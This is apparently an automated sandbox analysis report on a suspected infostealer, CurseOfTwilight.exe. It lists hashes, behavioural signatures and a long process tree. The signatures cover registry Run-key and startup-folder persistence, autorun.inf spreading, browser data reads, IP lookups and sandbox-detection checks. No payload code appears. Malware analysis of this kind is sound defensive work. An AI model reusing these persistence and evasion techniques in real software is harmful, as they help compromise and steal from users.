Overview
overview
7Static
static
3CurseOfTwilight.exe
windows10-1703-x64
7$PLUGINSDI...ls.dll
windows10-1703-x64
3$PLUGINSDI...em.dll
windows10-1703-x64
3CurseOfTwilight.exe
windows10-1703-x64
7LICENSES.c...m.html
windows10-1703-x64
6d3dcompiler_47.dll
windows10-1703-x64
1ffmpeg.dll
windows10-1703-x64
1libEGL.dll
windows10-1703-x64
1libGLESv2.dll
windows10-1703-x64
1locales/de.ps1
windows10-1703-x64
1resources/elevate.exe
windows10-1703-x64
1vk_swiftshader.dll
windows10-1703-x64
1vulkan-1.dll
windows10-1703-x64
1$PLUGINSDI...7z.dll
windows10-1703-x64
3Analysis
-
max time kernel
151s -
max time network
173s -
platform
windows10-1703_x64 -
resource
win10-20240221-en -
resource tags
arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system -
submitted
02/03/2024, 22:42
Static task
static1
Behavioral task
behavioral1
Sample
CurseOfTwilight.exe
Resource
win10-20240221-en
Behavioral task
behavioral2
Sample
$PLUGINSDIR/StdUtils.dll
Resource
win10-20240221-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/System.dll
Resource
win10-20240221-en
Behavioral task
behavioral4
Sample
CurseOfTwilight.exe
Resource
win10-20240221-en
Behavioral task
behavioral5
Sample
LICENSES.chromium.html
Resource
win10-20240221-en
Behavioral task
behavioral6
Sample
d3dcompiler_47.dll
Resource
win10-20240221-en
Behavioral task
behavioral7
Sample
ffmpeg.dll
Resource
win10-20240221-en
Behavioral task
behavioral8
Sample
libEGL.dll
Resource
win10-20240221-en
Behavioral task
behavioral9
Sample
libGLESv2.dll
Resource
win10-20240221-en
Behavioral task
behavioral10
Sample
locales/de.ps1
Resource
win10-20240221-en
Behavioral task
behavioral11
Sample
resources/elevate.exe
Resource
win10-20240221-en
Behavioral task
behavioral12
Sample
vk_swiftshader.dll
Resource
win10-20240221-en
Behavioral task
behavioral13
Sample
vulkan-1.dll
Resource
win10-20240221-en
Behavioral task
behavioral14
Sample
$PLUGINSDIR/nsis7z.dll
Resource
win10-20240221-en
General
-
Target
CurseOfTwilight.exe
-
Size
158.4MB
-
MD5
b74d098f0a6ae42c6bf9d6d576115bdf
-
SHA1
89efb5b86ce578b0f3946e98aebbd00ca60161ba
-
SHA256
e8b492b418a2855e3806e7f756414f37442e6efde006c7ca2615cfbe8fbf9f6e
-
SHA512
40a6c666057c21f7744812f8d466448f245ef56247cd0db179358aeb7635fa77980691e3d542f9b9dba30579d6bb330874cfc561c1fbce43bec8b4ce549852b7
-
SSDEEP
1572864:XdPcKUXsjgWcPlYufjnCtdTG1pTkvqN3PN5g9qPKFTQyun+9qS/ALy/s88IcgDFf:w1os5I8Ax
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000\Control Panel\International\Geo\Nation CurseOfTwilight.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CurseOfTwilight.exe CurseOfTwilight.exe -
Loads dropped DLL 2 IoCs
pid Process 4840 CurseOfTwilight.exe 4840 CurseOfTwilight.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDriverSetupP0HaCU = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CurseOfTwilight.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000\Software\Microsoft\Windows\CurrentVersion\Run\Start_P0HaCU = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\sysWin10Boot_P0HaCU.vbs" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 37 raw.githubusercontent.com 26 raw.githubusercontent.com 28 raw.githubusercontent.com 30 raw.githubusercontent.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 13 ipinfo.io 14 ipinfo.io -
Drops autorun.inf file 1 TTPs 1 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process File created F:\autorun.inf CurseOfTwilight.exe -
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz CurseOfTwilight.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString CurseOfTwilight.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 CurseOfTwilight.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 CurseOfTwilight.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz CurseOfTwilight.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString CurseOfTwilight.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 CurseOfTwilight.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2788 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 9616 WMIC.exe -
Enumerates processes with tasklist 1 TTPs 64 IoCs
pid Process 7408 tasklist.exe 7392 tasklist.exe 7100 tasklist.exe 7084 tasklist.exe 6832 tasklist.exe 6760 tasklist.exe 6572 tasklist.exe 7204 tasklist.exe 7356 tasklist.exe 7092 tasklist.exe 6784 tasklist.exe 6776 tasklist.exe 6712 tasklist.exe 7524 tasklist.exe 7492 tasklist.exe 7328 tasklist.exe 7116 tasklist.exe 7108 tasklist.exe 6932 tasklist.exe 6612 tasklist.exe 6880 tasklist.exe 6952 tasklist.exe 7320 tasklist.exe 7016 tasklist.exe 6992 tasklist.exe 6740 tasklist.exe 6640 tasklist.exe 6488 tasklist.exe 6908 tasklist.exe 7364 tasklist.exe 7500 tasklist.exe 7336 tasklist.exe 6816 tasklist.exe 6968 tasklist.exe 7508 tasklist.exe 6856 tasklist.exe 7424 tasklist.exe 7032 tasklist.exe 3812 tasklist.exe 6960 tasklist.exe 6800 tasklist.exe 6792 tasklist.exe 6900 tasklist.exe 7416 tasklist.exe 1728 tasklist.exe 7468 tasklist.exe 7400 tasklist.exe 7344 tasklist.exe 7124 tasklist.exe 7000 tasklist.exe 6824 tasklist.exe 6872 tasklist.exe 6564 tasklist.exe 1728 tasklist.exe 6696 tasklist.exe 7380 tasklist.exe 7372 tasklist.exe 7460 tasklist.exe 6480 tasklist.exe 6924 tasklist.exe 6864 tasklist.exe 7008 tasklist.exe 6672 tasklist.exe 6688 tasklist.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 48 IoCs
pid Process 4840 CurseOfTwilight.exe 4840 CurseOfTwilight.exe 4840 CurseOfTwilight.exe 4840 CurseOfTwilight.exe 4840 CurseOfTwilight.exe 4840 CurseOfTwilight.exe 10064 powershell.exe 10064 powershell.exe 10064 powershell.exe 10064 powershell.exe 9616 powershell.exe 9616 powershell.exe 9616 powershell.exe 9616 powershell.exe 6588 powershell.exe 6588 powershell.exe 8692 powershell.exe 8692 powershell.exe 6088 powershell.exe 6088 powershell.exe 6088 powershell.exe 8692 powershell.exe 6588 powershell.exe 6088 powershell.exe 8692 powershell.exe 6588 powershell.exe 7632 powershell.exe 7632 powershell.exe 7632 powershell.exe 7632 powershell.exe 2380 powershell.exe 2380 powershell.exe 2380 powershell.exe 2380 powershell.exe 9308 powershell.exe 9308 powershell.exe 9308 powershell.exe 9308 powershell.exe 10656 powershell.exe 10656 powershell.exe 10656 powershell.exe 10656 powershell.exe 6136 powershell.exe 6136 powershell.exe 6136 powershell.exe 6136 powershell.exe 5904 CurseOfTwilight.exe 5904 CurseOfTwilight.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 4840 CurseOfTwilight.exe Token: SeCreatePagefilePrivilege 4840 CurseOfTwilight.exe Token: SeDebugPrivilege 3812 tasklist.exe Token: SeIncreaseQuotaPrivilege 4752 WMIC.exe Token: SeSecurityPrivilege 4752 WMIC.exe Token: SeTakeOwnershipPrivilege 4752 WMIC.exe Token: SeLoadDriverPrivilege 4752 WMIC.exe Token: SeSystemProfilePrivilege 4752 WMIC.exe Token: SeSystemtimePrivilege 4752 WMIC.exe Token: SeProfSingleProcessPrivilege 4752 WMIC.exe Token: SeIncBasePriorityPrivilege 4752 WMIC.exe Token: SeCreatePagefilePrivilege 4752 WMIC.exe Token: SeBackupPrivilege 4752 WMIC.exe Token: SeRestorePrivilege 4752 WMIC.exe Token: SeShutdownPrivilege 4752 WMIC.exe Token: SeDebugPrivilege 4752 WMIC.exe Token: SeSystemEnvironmentPrivilege 4752 WMIC.exe Token: SeRemoteShutdownPrivilege 4752 WMIC.exe Token: SeUndockPrivilege 4752 WMIC.exe Token: SeManageVolumePrivilege 4752 WMIC.exe Token: 33 4752 WMIC.exe Token: 34 4752 WMIC.exe Token: 35 4752 WMIC.exe Token: 36 4752 WMIC.exe Token: SeIncreaseQuotaPrivilege 4752 WMIC.exe Token: SeSecurityPrivilege 4752 WMIC.exe Token: SeTakeOwnershipPrivilege 4752 WMIC.exe Token: SeLoadDriverPrivilege 4752 WMIC.exe Token: SeSystemProfilePrivilege 4752 WMIC.exe Token: SeSystemtimePrivilege 4752 WMIC.exe Token: SeProfSingleProcessPrivilege 4752 WMIC.exe Token: SeIncBasePriorityPrivilege 4752 WMIC.exe Token: SeCreatePagefilePrivilege 4752 WMIC.exe Token: SeBackupPrivilege 4752 WMIC.exe Token: SeRestorePrivilege 4752 WMIC.exe Token: SeShutdownPrivilege 4752 WMIC.exe Token: SeDebugPrivilege 4752 WMIC.exe Token: SeSystemEnvironmentPrivilege 4752 WMIC.exe Token: SeRemoteShutdownPrivilege 4752 WMIC.exe Token: SeUndockPrivilege 4752 WMIC.exe Token: SeManageVolumePrivilege 4752 WMIC.exe Token: 33 4752 WMIC.exe Token: 34 4752 WMIC.exe Token: 35 4752 WMIC.exe Token: 36 4752 WMIC.exe Token: SeShutdownPrivilege 4840 CurseOfTwilight.exe Token: SeCreatePagefilePrivilege 4840 CurseOfTwilight.exe Token: SeShutdownPrivilege 4840 CurseOfTwilight.exe Token: SeCreatePagefilePrivilege 4840 CurseOfTwilight.exe Token: SeDebugPrivilege 6500 tasklist.exe Token: SeDebugPrivilege 6480 tasklist.exe Token: SeDebugPrivilege 6472 tasklist.exe Token: SeDebugPrivilege 6564 tasklist.exe Token: SeDebugPrivilege 6612 tasklist.exe Token: SeDebugPrivilege 6648 tasklist.exe Token: SeDebugPrivilege 6792 tasklist.exe Token: SeDebugPrivilege 6556 tasklist.exe Token: SeDebugPrivilege 6488 tasklist.exe Token: SeDebugPrivilege 6776 tasklist.exe Token: SeDebugPrivilege 6432 tasklist.exe Token: SeDebugPrivilege 6784 tasklist.exe Token: SeDebugPrivilege 6800 tasklist.exe Token: SeDebugPrivilege 6632 tasklist.exe Token: SeDebugPrivilege 6740 tasklist.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4840 wrote to memory of 3640 4840 CurseOfTwilight.exe 73 PID 4840 wrote to memory of 3640 4840 CurseOfTwilight.exe 73 PID 3640 wrote to memory of 3812 3640 cmd.exe 75 PID 3640 wrote to memory of 3812 3640 cmd.exe 75 PID 4840 wrote to memory of 1284 4840 CurseOfTwilight.exe 77 PID 4840 wrote to memory of 1284 4840 CurseOfTwilight.exe 77 PID 4840 wrote to memory of 1284 4840 CurseOfTwilight.exe 77 PID 4840 wrote to memory of 1284 4840 CurseOfTwilight.exe 77 PID 4840 wrote to memory of 1284 4840 CurseOfTwilight.exe 77 PID 4840 wrote to memory of 1284 4840 CurseOfTwilight.exe 77 PID 4840 wrote to memory of 1284 4840 CurseOfTwilight.exe 77 PID 4840 wrote to memory of 1284 4840 CurseOfTwilight.exe 77 PID 4840 wrote to memory of 1284 4840 CurseOfTwilight.exe 77 PID 4840 wrote to memory of 1284 4840 CurseOfTwilight.exe 77 PID 4840 wrote to memory of 1284 4840 CurseOfTwilight.exe 77 PID 4840 wrote to memory of 1284 4840 CurseOfTwilight.exe 77 PID 4840 wrote to memory of 1284 4840 CurseOfTwilight.exe 77 PID 4840 wrote to memory of 1284 4840 CurseOfTwilight.exe 77 PID 4840 wrote to memory of 1284 4840 CurseOfTwilight.exe 77 PID 4840 wrote to memory of 1284 4840 CurseOfTwilight.exe 77 PID 4840 wrote to memory of 1284 4840 CurseOfTwilight.exe 77 PID 4840 wrote to memory of 1284 4840 CurseOfTwilight.exe 77 PID 4840 wrote to memory of 1284 4840 CurseOfTwilight.exe 77 PID 4840 wrote to memory of 1284 4840 CurseOfTwilight.exe 77 PID 4840 wrote to memory of 1284 4840 CurseOfTwilight.exe 77 PID 4840 wrote to memory of 1284 4840 CurseOfTwilight.exe 77 PID 4840 wrote to memory of 1284 4840 CurseOfTwilight.exe 77 PID 4840 wrote to memory of 1284 4840 CurseOfTwilight.exe 77 PID 4840 wrote to memory of 1284 4840 CurseOfTwilight.exe 77 PID 4840 wrote to memory of 1284 4840 CurseOfTwilight.exe 77 PID 4840 wrote to memory of 1284 4840 CurseOfTwilight.exe 77 PID 4840 wrote to memory of 1284 4840 CurseOfTwilight.exe 77 PID 4840 wrote to memory of 1284 4840 CurseOfTwilight.exe 77 PID 4840 wrote to memory of 1284 4840 CurseOfTwilight.exe 77 PID 4840 wrote to memory of 3696 4840 CurseOfTwilight.exe 78 PID 4840 wrote to memory of 3696 4840 CurseOfTwilight.exe 78 PID 4840 wrote to memory of 4352 4840 CurseOfTwilight.exe 79 PID 4840 wrote to memory of 4352 4840 CurseOfTwilight.exe 79 PID 4352 wrote to memory of 4752 4352 cmd.exe 81 PID 4352 wrote to memory of 4752 4352 cmd.exe 81 PID 4840 wrote to memory of 4684 4840 CurseOfTwilight.exe 82 PID 4840 wrote to memory of 4684 4840 CurseOfTwilight.exe 82 PID 4840 wrote to memory of 3744 4840 CurseOfTwilight.exe 84 PID 4840 wrote to memory of 3744 4840 CurseOfTwilight.exe 84 PID 4840 wrote to memory of 344 4840 CurseOfTwilight.exe 85 PID 4840 wrote to memory of 344 4840 CurseOfTwilight.exe 85 PID 4840 wrote to memory of 828 4840 CurseOfTwilight.exe 87 PID 4840 wrote to memory of 828 4840 CurseOfTwilight.exe 87 PID 4840 wrote to memory of 3088 4840 CurseOfTwilight.exe 89 PID 4840 wrote to memory of 3088 4840 CurseOfTwilight.exe 89 PID 4840 wrote to memory of 1172 4840 CurseOfTwilight.exe 90 PID 4840 wrote to memory of 1172 4840 CurseOfTwilight.exe 90 PID 4840 wrote to memory of 68 4840 CurseOfTwilight.exe 91 PID 4840 wrote to memory of 68 4840 CurseOfTwilight.exe 91 PID 4840 wrote to memory of 4748 4840 CurseOfTwilight.exe 92 PID 4840 wrote to memory of 4748 4840 CurseOfTwilight.exe 92 PID 4840 wrote to memory of 2864 4840 CurseOfTwilight.exe 94 PID 4840 wrote to memory of 2864 4840 CurseOfTwilight.exe 94 PID 4840 wrote to memory of 4488 4840 CurseOfTwilight.exe 95 PID 4840 wrote to memory of 4488 4840 CurseOfTwilight.exe 95 PID 4840 wrote to memory of 4296 4840 CurseOfTwilight.exe 96 PID 4840 wrote to memory of 4296 4840 CurseOfTwilight.exe 96 PID 4840 wrote to memory of 4300 4840 CurseOfTwilight.exe 98 PID 4840 wrote to memory of 4300 4840 CurseOfTwilight.exe 98 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 6584 attrib.exe 9072 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe"C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe"1⤵
- Checks computer location settings
- Drops startup file
- Loads dropped DLL
- Drops autorun.inf file
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4840 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵
- Suspicious use of WriteProcessMemory
PID:3640 -
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3812
-
-
-
C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe"C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1648 --field-trial-handle=1652,i,10145686144927012465,2029700584885424378,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:22⤵PID:1284
-
-
C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe"C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=2148 --field-trial-handle=1652,i,10145686144927012465,2029700584885424378,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:82⤵PID:3696
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=4840 get ExecutablePath"2⤵
- Suspicious use of WriteProcessMemory
PID:4352 -
C:\Windows\System32\Wbem\WMIC.exewmic process where processid=4840 get ExecutablePath3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4752
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4684
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3744
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:6620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:344
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:6612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:828
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3088
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1172
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:6488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:68
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:6720
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4748
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2864
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4488
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6672
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4296
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:6752
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4300
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:6844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3760
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:6564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:428
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:6480
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:200
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4788
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7160
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4108
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2816
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6856
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4720
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4304
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4784
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3816
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7048
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1092
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7304
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5100
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6648
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4576
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6968
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4736
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:6976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1044
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4624
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:6740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3404
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4820
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7132
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4516
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:692
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6712
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2772
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6924
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4476
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4832
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4536
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:996
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2280
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2044
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1260
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7344
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3328
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7632
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:208
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1496
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2388
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:6808
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1336
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7524
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1048
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2436
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7400
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3680
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6908
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:380
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7516
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1588
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7336
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5072
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6816
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1652
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:6944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2224
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7372
-
-
-
